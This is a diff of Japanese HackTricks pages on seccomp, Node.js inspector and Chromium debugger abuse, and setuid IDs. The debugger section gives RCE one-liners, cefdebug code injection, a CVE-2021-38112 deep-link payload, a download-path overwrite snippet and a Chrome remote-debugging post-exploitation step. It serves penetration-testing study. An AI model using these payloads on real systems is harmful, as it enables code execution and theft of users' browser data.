* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください**。
</details>
```
また、**rootユーザーでないと他のプロセスの名前空間に入ることはできません**。そして、他の名前空間に**ディスクリプタ**が指すことなしに**入ることはできません**(例:`/proc/self/ns/net`)。

75
linux-hardening/privilege-escalation/docker-security/seccomp.md
View file

@ -2,32 +2,29 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**フォローしてください。**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
</details>
## 基本情報
**Seccomp**(セキュアコンピューティングモード)は、要約すると、**システムコールフィルター**として機能するLinuxカーネルの機能です。
Seccompには2つのモードがあります。
**Seccomp** は、Secure Computing mode の略で、**Linuxカーネルのセキュリティ機能**であり、システムコールをフィルタリングするように設計されています。プロセスをシステムコールの限られたセット(`exit()`、`sigreturn()`、`read()`、および既に開かれたファイルディスクリプタ用の`write()`)に制限します。プロセスが他の何かを呼び出そうとすると、カーネルによって SIGKILL または SIGSYS を使用して終了させられます。このメカニズムはリソースを仮想化するのではなく、プロセスをそれらから分離します。
**seccomp**(セキュアコンピューティングモードの略)は、**Linux** **カーネル**のコンピュータセキュリティ機能です。seccompを使用すると、プロセスは"セキュア"な状態に一方向の遷移を行うことができ、**すでに開かれている**ファイルディスクリプタに対して`exit()`、`sigreturn()`、`read()`、`write()`のシステムコール以外は実行できません。他のシステムコールを試みた場合、**カーネル**はプロセスをSIGKILLまたはSIGSYSで**終了**させます。この意味で、システムのリソースを仮想化するのではなく、プロセスを完全に隔離します。
Seccomp をアクティブ化する方法には、`prctl(2)` システムコールを使用して `PR_SET_SECCOMP` を介して行う方法と、Linuxカーネル3.17以降では `seccomp(2)` システムコールを使用する方法があります。`/proc/self/seccomp` に書き込むことで Seccomp を有効にする古い方法は、`prctl()` に代わって非推奨となっています。
seccompモードは、`PR_SET_SECCOMP`引数を使用して`prctl(2)`システムコールを介して**有効にされます**、またはLinuxカーネル3.17以降)`seccomp(2)`システムコールを介して有効にされます。以前は、`/proc/self/seccomp`というファイルに書き込むことでseccompモードを有効にしていましたが、`prctl()`を使用する方法に置き換えられました。一部のカーネルバージョンでは、seccompは`RDTSC` x86命令を無効にします。これは、電源オン以降の経過プロセッササイクル数を返すもので、高精度のタイミングに使用されます。
拡張機能である **seccomp-bpf** は、Berkeley Packet FilterBPFルールを使用してカスタマイズ可能なポリシーでシステムコールをフィルタリングする機能を追加します。この拡張機能は、OpenSSH、vsftpd、Chrome OS および Linux 上の Chrome/Chromium ブラウザなどのソフトウェアによって活用され、柔軟で効率的なシスコールフィルタリングを提供し、Linux でサポートされなくなった systrace に代わるものとなっています。
**seccomp-bpf**は、Berkeley Packet Filterルールを使用して実装された設定可能なポリシーを使用してシステムコールをフィルタリングすることを可能にするseccompの拡張です。これは、Chrome OSとLinuxのGoogle Chrome/Chromiumウェブブラウザだけでなく、OpenSSHやvsftpdによって使用されています。この点で、seccomp-bpfは、Linuxではもはやサポートされていないように見える古いsystraceと同様の機能を達成しますが、より柔軟性があり、パフォーマンスが高いです。
### **オリジナル/厳格モード**
### **オリジナル/ストリクトモード**
このモードでは、Seccompはシステムコール`exit()`、`sigreturn()`、`read()`、`write()`のみを**許可します**。これらはすでに開かれているファイルディスクリプタに対してのみです。他のシステムコールが行われた場合、プロセスはSIGKILLを使用して終了されます。
このモードでは、Seccomp は既に開かれたファイルディスクリプタに対して `exit()`、`sigreturn()`、`read()`、`write()` のシスコールのみを許可します。他のシスコールが行われた場合、プロセスは SIGKILL を使用して終了されます。
{% code title="seccomp_strict.c" %}
```c
@ -61,13 +58,9 @@ int input = open("output.txt", O_RDONLY);
printf("You will not see this message--the process will be killed first\n");
}
```
{% endcode %}
### Seccomp-bpf
このモードでは、Berkeley Packet Filterルールを使用して実装された設定可能なポリシーを使用して**システムコールのフィルタリング**が可能です。
{% code title="seccomp_bpf.c" %}
このモードは、Berkeley Packet Filter ルールを使用して実装された設定可能なポリシーを使用してシステムコールをフィルタリングすることを可能にします。
```c
#include <seccomp.h>
#include <unistd.h>
@ -115,31 +108,31 @@ seccomp_release(ctx);
printf("this process is %d\n", getpid());
}
```
{% endcode %}
## DockerにおけるSeccomp
**Seccomp-bpf**は、コンテナからの**syscalls**を効果的に制限し、攻撃面を減少させるために**Docker**によってサポートされています。**デフォルトでブロックされるsyscalls**は[https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)で確認でき、**デフォルトのseccompプロファイル**はこちらで見つけることができます[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)。\
異なるseccompポリシーを使用してdockerコンテナを実行するには:
**Seccomp-bpf**は、**Docker**によってサポートされており、コンテナからの**syscalls**を制限することで効果的に表面積を減らすことができます。**デフォルトでブロックされているsyscalls**は[https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/)で見つけることができ、**デフォルトのseccompプロファイル**はこちらにあります[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)。\
異なるseccompポリシーを使用してdockerコンテナを実行することができます:
```bash
docker run --rm \
-it \
--security-opt seccomp=/path/to/seccomp/profile.json \
hello-world
```
例えば、あるコンテナが`uname`のような**syscall**を実行するのを**禁止**したい場合、[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) からデフォルトプロファイルをダウンロードし、リストから`uname`文字列を**削除する**だけです。\
**あるバイナリがdockerコンテナ内で動作しないようにする**ためには、straceを使用してバイナリが使用しているsyscallをリストアップし、それらを禁止することができます。\
以下の例では、`uname`の**syscall**が発見されています:
たとえば、`uname`のような**syscall**の実行を**禁止**したい場合は、[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) からデフォルトプロファイルをダウンロードし、単純に**リストから`uname`の文字列を削除**すればよいです。\
**あるバイナリがdockerコンテナ内で動作しないように**するには、straceを使用してバイナリが使用している**syscall**をリストアップし、それらを禁止することができます。\
次の例では、`uname`の**syscalls**が発見されます:
```bash
docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname
```
{% hint style="info" %}
**Dockerを使用してアプリケーションを起動するだけの場合**、**`strace`** でプロファイリングし、必要なシステムコールのみを許可することができます。
**Dockerを単にアプリケーションを起動するために使用している場合**、**`strace`**でそれを**プロファイリング**し、必要な**システムコールのみを許可**できます。
{% endhint %}
### Seccompポリシーの例
Seccomp機能を説明するために、以下のように“chmod”システムコールを無効にするSeccompプロファイルを作成しましょう。
[こちらの例](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)からの例を示します。
Seccomp機能を説明するために、以下のように「chmod」システムコールを無効にするSeccompプロファイルを作成します。
```json
{
"defaultAction": "SCMP_ACT_ALLOW",
@ -151,13 +144,13 @@ Seccomp機能を説明するために、以下のように“chmod”システ
]
}
```
上記のプロファイルでは、デフォルトアクションを「allow」設定し、「chmod」を無効にするブラックリストを作成しました。より安全にするために、デフォルトアクションをdropに設定し、システムコールを選択的に有効にするホワイトリストを作成できます。
以下の出力は、seccompプロファイルで無効にされているため、「chmod」コールがエラーを返していることを示しています。
上記のプロファイルでは、デフォルトアクションを「allow」設定し、「chmod」を無効にするブラックリストを作成しました。より安全にするために、デフォルトアクションをdropに設定し、システムコールを選択的に有効にするホワイトリストを作成することができます。\
以下の出力は、seccompプロファイルで無効になっているため、「chmod」呼び出しがエラーを返すことを示しています。
```bash
$ docker run --rm -it --security-opt seccomp:/home/smakam14/seccomp/profile.json busybox chmod 400 /etc/hosts
chmod: /etc/hosts: Operation not permitted
```
以下の出力は、「docker inspect」がプロファイルを表示していることを示しています:
以下は、プロファイルを表示する「docker inspect」の出力を示しています:
```json
"SecurityOpt": [
"seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}"
@ -165,20 +158,6 @@ chmod: /etc/hosts: Operation not permitted
```
### Dockerで無効にする
フラグを使用してコンテナを起動します: **`--security-opt seccomp=unconfined`**
フラグを使用してコンテナを起動します**`--security-opt seccomp=unconfined`**
Kubernetes 1.19から、**すべてのPodに対してseccompがデフォルトで有効になっています**。しかし、Podに適用されるデフォルトのseccompプロファイルは、コンテナランタイム例えば、Docker、containerdによって**提供される"RuntimeDefault"プロファイルです**。"RuntimeDefault"プロファイルは、ほとんどのシステムコールを許可しつつ、危険と考えられるものやコンテナに一般的に必要ではないものをいくつかブロックします。
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)で<strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>
Kubernetes 1.19では、**すべてのPodに対してseccompがデフォルトで有効**になっています。ただし、Podに適用されるデフォルトのseccompプロファイルは、コンテナランタイムDocker、containerdによって**提供される** "**RuntimeDefault**"プロファイルです。 "RuntimeDefault"プロファイルは、ほとんどのシステムコールを許可し、コンテナにとって危険または一般的に必要とされないいくつかのシステムコールをブロックします。

96
linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
View file

@ -1,30 +1,30 @@
# Node inspector/CEFデバッグの悪用
# Node inspector/CEF debugの悪用
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>
## 基本情報
`--inspect`スイッチで起動されたNode.jsプロセスは、デバッグクライアントを待ち受けます。**デフォルト**では、ホストとポート**`127.0.0.1:9229`**でリッスンします。各プロセスには、**ユニークな** **UUID**も割り当てられます。
[ドキュメントから](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): `--inspect`スイッチで起動すると、Node.jsプロセスはデバッグクライアントを待機します。**デフォルト**では、ホストとポート**`127.0.0.1:9229`**で待機します。各プロセスには**一意のUUID**も割り当てられます。
インスペクタークライアントは、接続するためにホストアドレス、ポート、およびUUIDを知っていて指定する必要があります。完全なURLは`ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`のようになります。
Inspectorクライアントは、接続するためにホストアドレス、ポート、およびUUIDを知って指定する必要があります。完全なURLは`ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`のようになります。
{% hint style="warning" %}
**デバッガーはNode.js実行環境に完全にアクセスできるため**、このポートに接続できる悪意のあるアクターは、Node.jsプロセスに代わって任意のコードを実行する可能性があります**潜在的な権限昇格**)。
**デバッガーはNode.js実行環境への完全なアクセス権を持っている**ため、このポートに接続できる悪意のあるアクターは、Node.jsプロセスの代わりに任意のコードを実行できる可能性があります**潜在的な特権昇格**)。
{% endhint %}
インスペクターを起動する方法はいくつかあります:
Inspectorを開始する方法はいくつかあります:
```bash
node --inspect app.js #Will run the inspector in port 9229
node --inspect=4444 app.js #Will run the inspector in port 4444
@ -35,50 +35,50 @@ node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and po
node --inspect --inspect-port=0 app.js #Will run the inspector in a random port
# Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector
```
プロセスの検査を開始すると、次のようなものが表示されます:
インスペクトされたプロセスを開始すると、次のようなものが表示されます:
```
Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
For help, see: https://nodejs.org/en/docs/inspector
```
**CEF****Chromium Embedded Framework**をベースにしたプロセスは、デバッガを開くためにパラメータ `--remote-debugging-port=9222` を使用する必要がありますSSRF保護は非常に似ています。しかし、**NodeJS** **デバッグ**セッションを提供する代わりに、ブラウザと通信するために[**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/)を使用します。これはブラウザを制御するためのインターフェースですが、直接的なRCEはありません。
**CEF****Chromium Embedded Framework**ベースのプロセスは、デバッガーを開くために`--remote-debugging-port=9222`というパラメータを使用する必要がありますSSRF保護は非常に似ています。ただし、これらは**NodeJS**の**デバッグ**セッションを許可する代わりに、[**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/)を使用してブラウザと通信します。これはブラウザを制御するためのインターフェースですが、直接的なRCEはありません。
デバッグされたブラウザを起動すると、次のようなものが表示されます:
```
DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
```
### ブラウザ、WebSockets、および同一生成元ポリシー <a href="#browsers-websockets-and-same-origin-policy" id="browsers-websockets-and-same-origin-policy"></a>
### ブラウザ、WebSockets、および同一オリジンポリシー <a href="#browsers-websockets-and-same-origin-policy" id="browsers-websockets-and-same-origin-policy"></a>
ウェブブラウザで開かれたウェブサイトは、ブラウザのセキュリティモデルの下でWebSocketおよびHTTPリクエストを行うことができます。**初期HTTP接続**が必要です。これは**一意のデバッガーセッションIDを取得するためです**。**同一生成元ポリシー**は、ウェブサイトが**このHTTP接続**を行うことを**防ぎます**。追加のセキュリティとして、Node.jsは**DNSリバインディング攻撃**に対する保護のため、接続の**'Host'ヘッダー**が**IPアドレス**、**`localhost`**、または**`localhost6`**を正確に指定していることを確認します。
WebサイトはWebブラウザで開かれると、ブラウザのセキュリティモデルに従ってWebSocketおよびHTTPリクエストを行うことができます。**固有のデバッガーセッションIDを取得するためには、最初にHTTP接続が必要**です。**同一オリジンポリシー**は、Webサイトが**このHTTP接続**を行うことを防ぎます。[**DNS再バインディング攻撃**](https://en.wikipedia.org/wiki/DNS\_rebinding)****に対する追加のセキュリティ対策として、Node.jsは接続のための**'Host'ヘッダー**が**IPアドレス**または**`localhost`**または**`localhost6`**を正確に指定していることを検証します。
{% hint style="info" %}
この**セキュリティ対策は、単にHTTPリクエストを送信することでインスペクターを悪用してコードを実行することを防ぎます**これはSSRF脆弱性を悪用して行うことができます)。
この**セキュリティ対策により、インスペクターを悪用してコードを実行する**ことが防がれますこれはSSRF脆弱性を悪用して行うことができる)。
{% endhint %}
### 実行中のプロセスでインスペクターを開始する
### 実行中プロセスでのインスペクターの開始
実行中のnodejsプロセスに**シグナルSIGUSR1を送信する**ことで、デフォルトポートで**インスペクターを開始**させることができます。ただし、十分な権限を持っている必要があるため、これによりプロセス内の情報に対する**特権アクセスが付与される**可能性がありますが、直接的な権限昇格にはなりません。
実行中のnodejsプロセスに**シグナルSIGUSR1**を送信して、**デフォルトポートでインスペクターを開始**させることができます。ただし、十分な権限が必要なので、これによりプロセス内の情報に**特権アクセス**が得られるかもしれませんが、直接的な特権昇格は行われません。
```bash
kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
```
{% hint style="info" %}
これはコンテナで便利です。なぜなら、`--inspect`を付けて**プロセスを終了し、新しいプロセスを開始する**ことは**選択肢ではありません**。なぜなら、**コンテナ**はプロセスと共に**終了される**からです。
これはコンテナ内で便利です。`--inspect`を使用してプロセスを**シャットダウンして新しいプロセスを起動**することは**選択肢ではない**ため、**コンテナ**はプロセスとともに**終了**されます。
{% endhint %}
### インスペクタ/デバッガに接続する
### インスペクタ/デバッガに接続
**Chromiumベースのブラウザ**にアクセスできる場合、`chrome://inspect` または Edge で `edge://inspect` にアクセスして接続できます。Configureボタンをクリックし、**ターゲットホストとポート**がリストされていることを確認してください次のセクションの例を使用してRCEを取得する方法の例を以下の画像で見つけてください
**Chromiumベースのブラウザ**に接続するには、Chromeの場合は`chrome://inspect`またはEdgeの場合は`edge://inspect`のURLにアクセスできます。Configureボタンをクリックして、**ターゲットホストとポート**が正しくリストされていることを確認する必要があります。画像はリモートコード実行RCEの例を示しています
![](<../../.gitbook/assets/image (620) (1).png>)
**コマンドライン**を使用して、以下のようにデバッガ/インスペクタに接続できます:
**コマンドライン**を使用して、デバッガ/インスペクタに接続できます:
```bash
node inspect <ip>:<port>
node inspect 127.0.0.1:9229
# RCE example from debug console
debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')")
```
ツール [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug) は、ローカルで実行されている**インスペクターを見つける**ことと、それらに**コードを注入する**ことができます。
ツール[**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug)は、ローカルで実行中の**インスペクターを見つけ**、それに**コードを注入**することができます。
```bash
#List possible vulnerable sockets
./cefdebug.exe
@ -88,42 +88,40 @@ debug> exec("process.mainModule.require('child_process').exec('/Applications/iTe
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"
```
{% hint style="info" %}
**NodeJS RCE** が動作しないことに注意してください。これは [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) 経由でブラウザに接続されている場合ですAPIをチェックして、それを使って行える興味深いことを見つける必要があります)。
**NodeJS RCE exploits**は、ブラウザを[**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/)経由で接続している場合には機能しません興味深いことを見つけるためにAPIをチェックする必要があります)。
{% endhint %}
## NodeJS デバッガー/インスペクターにおける RCE
## NodeJSデバッガー/インスペクターでのRCE
{% hint style="info" %}
もし Electron での XSS からの [**RCE を取得する方法を探している場合は、このページをご覧ください。**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
もし[**ElectronのXSSからRCEを取得する方法**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)を探してここに来たのであれば、このページをチェックしてください。
{% endhint %}
Node **インスペクター**に**接続**できる場合に **RCE** を取得する一般的な方法は以下のようなものです(これは **Chrome DevTools protocol への接続では動作しない**ようです):
Node **inspector**に**接続**できる場合に**RCE**を取得する一般的な方法は、次のようなものを使用することですChrome DevToolsプロトコルへの接続では動作しないようです:
```javascript
process.mainModule.require('child_process').exec('calc')
window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe")
require('child_process').spawnSync('calc.exe')
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
```
## Chrome DevTools Protocol ペイロード
## Chrome DevTools Protocol Payloads
APIはこちらで確認できます: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\
このセクションでは、このプロトコルを利用して人々がどのような興味深いことを行ったかをリストアップします。
APIは[こちら](https://chromedevtools.github.io/devtools-protocol/)で確認できます。\
このセクションでは、このプロトコルを悪用するために人々が使用してきた興味深い事柄をリストアップします。
### ディープリンクを介したパラメータインジェクション
### ディープリンクを介したパラメータインジェクション
[**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) で Rhino security は、CEFに基づいたアプリケーションがシステムにカスタムURIworkspaces://を登録し、受け取った完全なURIを使用して、そのURIから部分的に構成された設定で **CEFベースのアプリケーションを起動**することを発見しました。
[**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/)では、Rhino Securityが、CEFに基づくアプリケーションがシステムにカスタムURIworkspaces://を登録し、そのURIを受け取り、そのURIから部分的に構築された構成でCEFベースのアプリケーションを起動していたことを発見しました。
URIパラメータがURLデコードされてCEFベーシックアプリケーションを起動するために使用され、ユーザーが **コマンドライン****`--gpu-launcher`** フラグを **インジェクト** して任意のことを実行できることが判明しました。
URIパラメーターがURLデコードされ、CEFベースのアプリケーションを起動するために使用されていたことが発見され、ユーザーがコマンドラインに`--gpu-launcher`フラグをインジェクトして任意の操作を実行できるようになりました。
したがって、ペイロードは次のようになります
したがって、次のようなペイロード:
```
workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE
```
実行するとcalc.exeが起動します。
### ファイルの上書き
**ダウンロードされたファイルが保存されるフォルダ**を変更し、アプリケーションの頻繁に使用される**ソースコード**をあなたの**悪意のあるコード**で**上書き**するためのファイルをダウンロードします。
**ダウンロードされたファイルが保存されるフォルダ**を変更し、**悪意のあるコード**で**アプリケーションのソースコード**を頻繁に使用されるファイルで上書きします。
```javascript
ws = new WebSocket(url); //URL of the chrome devtools service
ws.send(JSON.stringify({
@ -135,15 +133,15 @@ downloadPath: '/code/'
}
}));
```
### Webdriver RCEと情報流出
### Webdriver RCE と情報流出
この投稿によると: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) theriverから内部ページをRCEと情報流出することが可能です。
この投稿によると: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148)、theriver から RCE を取得し、内部ページを流出させることが可能です。
### 侵害後の活動
### ポストエクスプロイテーション
実際の環境で、Chrome/Chromiumベースのブラウザを使用するユーザーPCを**侵害した後**、**デバッグを有効にしてChromeプロセスを起動し、デバッグポートをポートフォワード**することができます。これにより、Chromeで被害者が行うすべての操作を**検査し、機密情報を盗む**ことができます
実際の環境において、**ユーザーの PC が Chrome/Chromium ベースのブラウザを使用している場合に**、Chrome プロセスを起動し、**デバッグを有効にしてデバッグポートをポートフォワード**することができます。これにより、Chrome を使用している被害者の行動を**すべて検査し、機密情報を盗むことができます**
ステルスな方法は、**すべてのChromeプロセスを終了**させ、次のようなものを呼び出すことです
ステルス的な方法は、**すべての Chrome プロセスを終了**し、次のようなものを呼び出すことです:
```bash
Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
```
@ -162,14 +160,14 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[Telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>

120
linux-hardening/privilege-escalation/euid-ruid-suid.md
View file

@ -2,71 +2,71 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか?**HackTricksにあなたの会社を広告したいですか** または、**最新のPEASSバージョンにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか** [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。これは私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
